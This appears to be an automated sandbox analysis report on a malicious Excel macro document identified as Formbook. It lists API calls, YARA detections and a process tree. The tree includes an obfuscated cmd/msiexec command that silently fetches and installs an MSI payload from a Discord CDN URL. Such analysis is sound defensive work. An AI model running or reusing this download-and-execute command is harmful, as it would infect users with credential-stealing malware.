Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFE24 NtWriteVirtualMemory, 9_2_021EFE24
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFEA0 NtReadVirtualMemory, 9_2_021EFEA0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFF34 NtQueueApcThread, 9_2_021EFF34
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFFFC NtCreateProcessEx, 9_2_021EFFFC
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFC30 NtOpenProcess, 9_2_021EFC30
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFC48 NtSetInformationFile, 9_2_021EFC48
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021F0C40 NtGetContextThread, 9_2_021F0C40
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFC90 NtUnmapViewOfSection, 9_2_021EFC90
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFD5C NtEnumerateKey, 9_2_021EFD5C
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021F1D80 NtSuspendThread, 9_2_021F1D80
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_00099D50 NtCreateFile, 9_2_00099D50
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_00099E00 NtReadFile, 9_2_00099E00
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_00099E80 NtClose, 9_2_00099E80
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_00099F30 NtAllocateVirtualMemory, 9_2_00099F30
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_00099DFB NtReadFile, 9_2_00099DFB
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_00099F2B NtAllocateVirtualMemory, 9_2_00099F2B
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024E93CE NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, 9_2_024E93CE
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024E9862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose, 9_2_024E9862
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024E93D2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 9_2_024E93D2
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024E9DAE NtResumeThread,NtClose, 9_2_024E9DAE
Deletes files inside the Windows folder
Source: C:\Windows\SysWOW64\cmd.exe File deleted: C:\Windows\Installer\MSID8B1.tmp Jump to behavior
Detected potential crypto function
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008FE0C6 7_2_008FE0C6
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0092D005 7_2_0092D005
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0091905A 7_2_0091905A
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_00903040 7_2_00903040
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008FE2E9 7_2_008FE2E9
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_009A1238 7_2_009A1238
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008FF3CF 7_2_008FF3CF
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_009263DB 7_2_009263DB
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_00902305 7_2_00902305
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_00907353 7_2_00907353
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0094A37B 7_2_0094A37B
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_00935485 7_2_00935485
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_00911489 7_2_00911489
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0093D47D 7_2_0093D47D
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0091C5F0 7_2_0091C5F0
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0090351F 7_2_0090351F
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_00904680 7_2_00904680
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0090E6C1 7_2_0090E6C1
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_009A2622 7_2_009A2622
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0098579A 7_2_0098579A
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0090C7BC 7_2_0090C7BC
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_009357C3 7_2_009357C3
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0099F8EE 7_2_0099F8EE
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0090C85C 7_2_0090C85C
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0092286D 7_2_0092286D
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_009A098E 7_2_009A098E
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_009029B2 7_2_009029B2
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_009169FE 7_2_009169FE
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_00985955 7_2_00985955
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_009B3A83 7_2_009B3A83
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_009ACBA4 7_2_009ACBA4
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0098DBDA 7_2_0098DBDA
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008FFBD7 7_2_008FFBD7
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_00927B00 7_2_00927B00
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0099FDDD 7_2_0099FDDD
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_00930D3B 7_2_00930D3B
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0090CD5B 7_2_0090CD5B
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_00932E2F 7_2_00932E2F
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0091EE4C 7_2_0091EE4C
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_00910F3F 7_2_00910F3F
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0092DF7C 7_2_0092DF7C
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_022A1238 9_2_022A1238
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021FE2E9 9_2_021FE2E9
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_02202305 9_2_02202305
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0224A37B 9_2_0224A37B
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_02207353 9_2_02207353
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_022A63BF 9_2_022A63BF
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021FF3CF 9_2_021FF3CF
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_022263DB 9_2_022263DB
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0222D005 9_2_0222D005
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_02203040 9_2_02203040
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0221905A 9_2_0221905A
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021FE0C6 9_2_021FE0C6
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_022A2622 9_2_022A2622
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0224A634 9_2_0224A634
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_02204680 9_2_02204680
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0220E6C1 9_2_0220E6C1
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0220C7BC 9_2_0220C7BC
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0228579A 9_2_0228579A
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_022357C3 9_2_022357C3
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0223D47D 9_2_0223D47D
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_02235485 9_2_02235485
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_02211489 9_2_02211489
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0220351F 9_2_0220351F
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_02246540 9_2_02246540
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0221C5F0 9_2_0221C5F0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_022B3A83 9_2_022B3A83
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_02227B00 9_2_02227B00
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_022ACBA4 9_2_022ACBA4
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021FFBD7 9_2_021FFBD7
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0228DBDA 9_2_0228DBDA
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0222286D 9_2_0222286D
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0220C85C 9_2_0220C85C
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0229F8EE 9_2_0229F8EE
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_02285955 9_2_02285955
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_022029B2 9_2_022029B2
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_022A098E 9_2_022A098E
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_022169FE 9_2_022169FE
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_02232E2F 9_2_02232E2F
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0221EE4C 9_2_0221EE4C
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_02210F3F 9_2_02210F3F
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0222DF7C 9_2_0222DF7C
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_02230D3B 9_2_02230D3B
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0220CD5B 9_2_0220CD5B
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0229FDDD 9_2_0229FDDD
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0009E071 9_2_0009E071
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0009E5FC 9_2_0009E5FC
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_00082D87 9_2_00082D87
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_00082D90 9_2_00082D90
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_00089E30 9_2_00089E30
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_00082FB0 9_2_00082FB0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024E9862 9_2_024E9862
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024E1069 9_2_024E1069
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024E1072 9_2_024E1072
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024E8132 9_2_024E8132
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024EDA6F 9_2_024EDA6F
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024EAA32 9_2_024EAA32
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024EDB0E 9_2_024EDB0E
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024E5B1F 9_2_024E5B1F
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024E5B22 9_2_024E5B22
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024E2CEC 9_2_024E2CEC
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024E2CF2 9_2_024E2CF2
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: 0d69e4f6_by_Libranalysis.xls OLE, VBA macro line: Private Sub workbook_open()
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function workbook_open Name: workbook_open
Document contains embedded VBA macros
Source: 0d69e4f6_by_Libranalysis.xls OLE indicator, VBA macros: true
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\wininit.exe Code function: String function: 0226F970 appears 81 times
Source: C:\Windows\SysWOW64\wininit.exe Code function: String function: 021FDF5C appears 118 times
Source: C:\Windows\SysWOW64\wininit.exe Code function: String function: 021FE2A8 appears 38 times
Source: C:\Windows\SysWOW64\wininit.exe Code function: String function: 0224373B appears 238 times
Source: C:\Windows\SysWOW64\wininit.exe Code function: String function: 02243F92 appears 108 times
Source: C:\Windows\Installer\MSID8B1.tmp Code function: String function: 008FE2A8 appears 38 times
Source: C:\Windows\Installer\MSID8B1.tmp Code function: String function: 0096F970 appears 81 times
Source: C:\Windows\Installer\MSID8B1.tmp Code function: String function: 008FDF5C appears 110 times
Source: C:\Windows\Installer\MSID8B1.tmp Code function: String function: 0094373B appears 238 times
Source: C:\Windows\Installer\MSID8B1.tmp Code function: String function: 00943F92 appears 108 times
Yara signature match
Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@12/4@6/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRCBB7.tmp Jump to behavior
Source: 0d69e4f6_by_Libranalysis.xls OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\msiexec.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: 0d69e4f6_by_Libranalysis.xls ReversingLabs: Detection: 38%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msiexec.exe mSiExec /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn
Source: unknown Process created: C:\Windows\Installer\MSID8B1.tmp C:\Windows\Installer\MSID8B1.tmp
Source: C:\Windows\Installer\MSID8B1.tmp Process created: C:\Windows\Installer\MSID8B1.tmp C:\Windows\Installer\MSID8B1.tmp
Source: C:\Windows\Installer\MSID8B1.tmp Process created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exe
Source: C:\Windows\SysWOW64\wininit.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Installer\MSID8B1.tmp'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msiexec.exe mSiExec /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn Jump to behavior
Source: C:\Windows\Installer\MSID8B1.tmp Process created: C:\Windows\Installer\MSID8B1.tmp C:\Windows\Installer\MSID8B1.tmp Jump to behavior
Source: C:\Windows\Installer\MSID8B1.tmp Process created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exe Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Installer\MSID8B1.tmp' Jump to behavior
Source: C:\Windows\System32\msiexec.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wininit.pdb source: MSID8B1.tmp, 00000007.00000003.2147755225.0000000000520000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: MSID8B1.tmp, wininit.exe

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Windows\Installer\MSID8B1.tmp Unpacked PE file: 7.2.MSID8B1.tmp.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
Document contains an embedded VBA with many string operations indicating source code obfuscation
Source: 0d69e4f6_by_Libranalysis.xls Stream path '_VBA_PROJECT_CUR/VBA/AK2_oiMjTt8L' : High number of string operations
Source: VBA code instrumentation OLE, VBA macro, High number of string operations: Module AK2_oiMjTt8L Name: AK2_oiMjTt8L
Obfuscated command line found
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008FDFA1 push ecx; ret 7_2_008FDFB4
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021FDFA1 push ecx; ret 9_2_021FDFB4
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_00096608 push esp; iretd 9_2_00096609
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_000998E6 pushad ; ret 9_2_000998EA
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_00097AA0 push 00FCAB15h; ret 9_2_00097AA6
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0009CEA5 push eax; ret 9_2_0009CEF8
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0009CEFB push eax; ret 9_2_0009CF62
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0009CEF2 push eax; ret 9_2_0009CEF8
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0009CF5C push eax; ret 9_2_0009CF62
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_00096FE8 push ss; retf 9_2_00096FE9
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024EE3E6 pushad ; ret 9_2_024EE3E7

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\Installer\MSID8B1.tmp File created: C:\Users\user\AppData\Local\Temp\nsjB879.tmp\5rov.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xE7
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
